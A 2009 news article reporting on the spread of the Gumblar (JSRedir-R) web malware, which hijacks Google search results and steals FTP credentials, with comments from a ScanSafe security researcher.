‘Gumblar’ virus could be bigger than Conficker worm

25 May 2009

A new malware virus is on the loose and within days has become accountable for half the malware on the web. It is particularly vicious because it targets Google users in particular.

The worm, also known as JSRedir-R, attacks computers through vulnerabilities in Adobe PDF reader and Flash player.

By last week, more than half of all malware found on websites was identified as Gumblar, with a new webpage infected every 4.5 seconds.

The worm redirects the user’s Google search results to sites that download more malware onto the machine or allow criminals to conduct phishing attacks to steal login details.

It has begun to spread on sites where passwords or software have been previously compromised and visitors are infected without realising it.

It is believed the malicious worm draws its code from a webpage based in China.

Once cybercriminals are in possession of a victim’s FTP credentials, any sites that the victim manages can also be targeted for compromise – a common malware propagation tactic, said IT security firm ScanSafe.

“Because of the complexity of the Gumblar compromises, detection via traditional methods, such as signature detection and blacklisting, are ineffective,” said Mary Landesman, senior security researcher at ScanSafe.

“Gumblar’s sophistication and incredible growth rate should serve as a wake up call to the IT community. As cybercrime evolves in sophistication, so must our protection against it.”

Google immediately delisted the compromised websites upon discovering the breach. However, in early May, the attackers caught wind of this and began replacing the suspect IP address with another IP address, allowing the compromised sites to once again be listed by search engines. Both the injection and the redirection occur locally, on the compromised computer, and not on the search engine itself.

“The cybercriminals responsible for Gumblar have learned to morph its features quickly,” said Landesman. “This, coupled with Gumblar’s other dynamic characteristics, is allowing the compromise to disseminate more rapidly than others we’ve seen.”

Gumblar is the latest wave of serious website compromises that have plagued web surfers for the past two years. Overall, web malware increased 300pc throughout 2008, with another 19pc increase in the first quarter of 2009.

By John Kennedy